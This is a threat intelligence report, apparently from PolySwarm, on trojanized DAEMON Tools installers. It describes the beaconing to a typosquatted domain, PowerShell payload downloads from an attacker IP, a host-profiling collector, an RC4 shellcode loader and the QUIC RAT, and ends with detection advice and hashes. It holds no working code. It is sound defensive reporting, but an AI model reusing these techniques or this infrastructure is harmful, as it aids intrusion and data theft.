Verticals Targeted: Government, Scientific Research, Manufacturing, Retail, Education
Regions Targeted: Russia, Belarus, Thailand, Brazil, Turkey, Spain, Germany, France, Italy, China
Related Families: QUIC RAT
Executive Summary
A large-scale supply chain compromise involving the widely used DAEMON Tools software platform has exposed organizations and consumers to malicious payload deployment through digitally signed installers distributed from the vendor’s legitimate infrastructure. The attack, active since at least April 8, 2026, involved trojanized versions of DAEMON Tools containing embedded backdoors capable of downloading and executing additional malware. While thousands of infection attempts were observed globally, the operation appears selectively targeted, with advanced payloads deployed against a small subset of victims.
Key Takeaways
- Trojanized DAEMON Tools installers were distributed from the legitimate vendor website using valid digital signatures.
- Attackers leveraged PowerShell-based download chains, shellcode loaders, and memory-resident implants.
- Secondary-stage targeting focused on a limited number of organizations despite broad initial infection volume.
- Evidence suggests possible Chinese-speaking operator involvement based on embedded language artifacts.
Overview
Researchers identified a sophisticated supply chain attack targeting users of the popular disk imaging utility DAEMON Tools. The compromise affected versions 12.5.0.2421 through 12.5.0.2434 and remained active at the time of disclosure. The malicious installers were distributed directly from the legitimate DAEMON Tools infrastructure and signed with authentic certificates belonging to developer AVB Disc Soft, significantly increasing the likelihood of user trust and successful execution. Kaspersky reported on this activity.
The operation demonstrates a continuing trend of attackers targeting trusted software supply chains to bypass traditional security controls and achieve widespread initial access. Several similar compromises observed throughout 2026 have impacted software ecosystems, indicating sustained adversary interest in trusted application distribution channels as high-value compromise vectors.
Researchers reportedly observed thousands of infection attempts across more than 100 countries and territories beginning in early April. However, despite the broad distribution model, only a limited subset of infected systems received advanced follow-on payloads. This operational behavior strongly suggests a staged profiling-and-selection workflow rather than indiscriminate mass malware deployment.
Trojanized Components and Initial Access
The compromise centered around three maliciously modified binaries embedded within the DAEMON Tools installation directory:
- DTHelper.exe
- DiscSoftBusServiceLite.exe
- DTShellHlp.exe
These binaries executed automatically during system startup and contained implanted backdoor functionality inserted into CRT initialization routines. Upon execution, the malware launched a dedicated thread responsible for beaconing to attacker-controlled infrastructure using HTTP GET requests.
The malware communicated with the typosquatted domain at Env-check.daemontools[.]cc.
The domain closely mimicked the legitimate DAEMON Tools infrastructure and was registered approximately one week before the observed beginning of the supply chain compromise.
The malicious server could respond with arbitrary shell commands executed through cmd.exe and PowerShell. Observed commands leveraged System.Net.WebClient to retrieve additional payloads from attacker infrastructure hosted at 38.180.107[.]76. Payloads were written to temporary directories and executed immediately before deletion attempts were performed to reduce forensic visibility.
Information Collection and Victim Profiling
The first-stage payload that was deployed broadly across infected systems functioned primarily as an information collector. The .NET executable, identified as envchk.exe, harvested extensive host telemetry including:
- MAC addresses
- Hostnames
- DNS domain names
- Running process lists
- Installed software inventories
- System locale information
Collected data was transmitted to attacker-controlled infrastructure through HTTP POST requests. Researchers additionally identified Chinese-language strings embedded within the executable, suggesting possible Chinese-speaking operator involvement, although no formal attribution has been established. The operational pattern strongly indicates the information collector was used to profile infected systems and identify high-value targets for subsequent malware deployment. Although thousands of systems received this payload, only approximately a dozen systems were selected for advanced follow-on activity.
Minimalistic Backdoor Deployment
Selected victims received a secondary payload described as a “minimalistic” backdoor. Delivery chains involved downloading encrypted shellcode and a loader executable capable of decrypting payloads using RC4 before executing them directly in memory.
The backdoor supported several capabilities including:
- Arbitrary shell command execution
- File downloads
- In-memory shellcode execution
- Persistent C2 communications
The malware communicated with attacker infrastructure using HTTP POST heartbeat requests and enabled operators to remotely execute commands and stage additional implants. Researchers also observed operational inconsistencies during hands-on-keyboard activity. Some deployment commands contained typographical errors including misspellings such as mcrypto.chiper instead of cipher, and malformed file references such as rypto.dll. These mistakes prevented successful execution in certain cases and suggest portions of the intrusion activity may have involved live operator interaction rather than fully automated tooling.
QUIC RAT and Advanced Payload Activity
In at least one confirmed case involving an educational institution in Russia, attackers escalated activity further through deployment of a more sophisticated implant dubbed QUIC RAT. QUIC RAT is a C++-based remote access trojan obfuscated using control flow flattening techniques and statically linked with the WolfSSL library. Researchers additionally identified embedded components of the legitimate msquic.dll library within the malware body. The RAT supports multiple communication protocols including HTTP, HTTP/3, QUIC, TCP, UDP, WSS, and DNS.
The malware was also observed injecting payloads into legitimate processes including notepad.exe and conhost.exe, techniques commonly associated with defense evasion and stealth execution. The limited deployment scope of QUIC RAT further reinforces the assessment that the broader DAEMON Tools compromise functioned as a selective targeting operation rather than purely opportunistic malware distribution.
Victimology
Affected systems were identified in more than 100 countries, with the highest concentrations observed in Russia, Brazil, Turkey, Spain, Germany, France, Italy, and China. Approximately 10% of affected systems belonged to businesses and organizations. Advanced backdoor deployments were concentrated against government, scientific, manufacturing, retail, and educational entities located primarily in Russia, Belarus, and Thailand.
At present, the attackers’ ultimate objectives remain unclear. The selective deployment methodology and advanced tooling could support either cyberespionage operations or financially motivated intrusion activity associated with “big game hunting” campaigns. Researchers stated that current evidence is insufficient for definitive attribution or objective assessment.
Detection and Defensive Considerations
The attack highlights several recurring supply chain attack themes increasingly observed across enterprise environments:
- Abuse of trusted digital signatures
- Delivery through legitimate software infrastructure
- PowerShell-based malware staging
- Memory-resident shellcode execution
- Use of publicly accessible directories for payload staging
- Injection into legitimate Windows processes
Organizations should immediately investigate systems running affected DAEMON Tools versions for indicators of compromise, suspicious PowerShell activity, abnormal outbound HTTP communications, and unauthorized processes originating from temporary directories or AppData locations. The operation also reinforces the importance of zero trust principles when evaluating trusted software ecosystems. Digitally signed binaries and legitimate update channels increasingly represent attractive compromise surfaces for advanced threat actors due to their inherent trust relationships inside enterprise environments.
Analyst Commentary
The DAEMON Tools compromise reflects the continued evolution of software supply chain operations from indiscriminate malware distribution toward hybrid models combining broad compromise with highly selective targeting. The attacker leveraged legitimate infrastructure, authentic code-signing certificates, and widely trusted software to establish a scalable victim acquisition pipeline while reserving advanced payload deployment for carefully profiled targets. This operational maturity mirrors tactics previously observed in major supply chain incidents.
The campaign also demonstrates how adversaries increasingly treat initial access at scale as an intelligence collection phase rather than the end objective itself. Broad deployment of lightweight reconnaissance tooling enabled the operator to identify systems of interest before escalating activity with more sophisticated implants such as QUIC RAT. This staged methodology reduces operational exposure while preserving advanced tooling for high-value environments.
For defenders, the incident reinforces the reality that trust-based assumptions surrounding signed software and legitimate download channels are no longer sufficient security boundaries. Organizations should ensure behavioral monitoring, memory analysis, process injection detection, and outbound network anomaly detection remain core components of modern defensive architecture. Traditional allowlisting models based solely on vendor reputation or code signing increasingly fail against sophisticated supply chain operations of this nature.
PolySwarm’s multi-engine malware analysis architecture can help security teams identify suspicious or low-consensus payloads associated with campaigns like the DAEMON Tools compromise. Supply chain attacks frequently involve malware delivered through trusted or digitally signed software, creating scenarios where detection coverage may vary significantly across security vendors during the early stages of a campaign. By aggregating verdicts from specialized micro-engines into a unified PolyScore, PolySwarm can provide additional visibility into emerging threats that may not yet have broad detection consensus. In campaigns involving staged payload deployment and rapidly changing malware infrastructure, access to diverse detection approaches and behavioral metadata becomes particularly valuable.
IOCs
PolySwarm has multiple samples associated with this activity.
12edcaafab7703d0819b1395f45c35e3083dd83fb8b128292cb11033453fb6e8
f8599bec9a6e86aab534f6282e8b812d4997ecdf2f6064a4c0326c5e7771eb42
d2a5c9cbb73849cc0667987c33a9bf3822718e1528faef005f1628de3348ffb0
da1a51b7022d8e726de981fcdb364096e90a8134dd380f9d76c4c20fea701836
70fb6c312529dcea7e7b2cd8fba198b5cae9fa8e3e4fe4da9f4d19997e24a00b
a916e56121212613d17932e124b68752c9312e73bde8f2351054bd64394257df
395ec7acd475a8acd358adc75c4615cf41737aed8a96c4f2dd792c8a6af4140c
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.
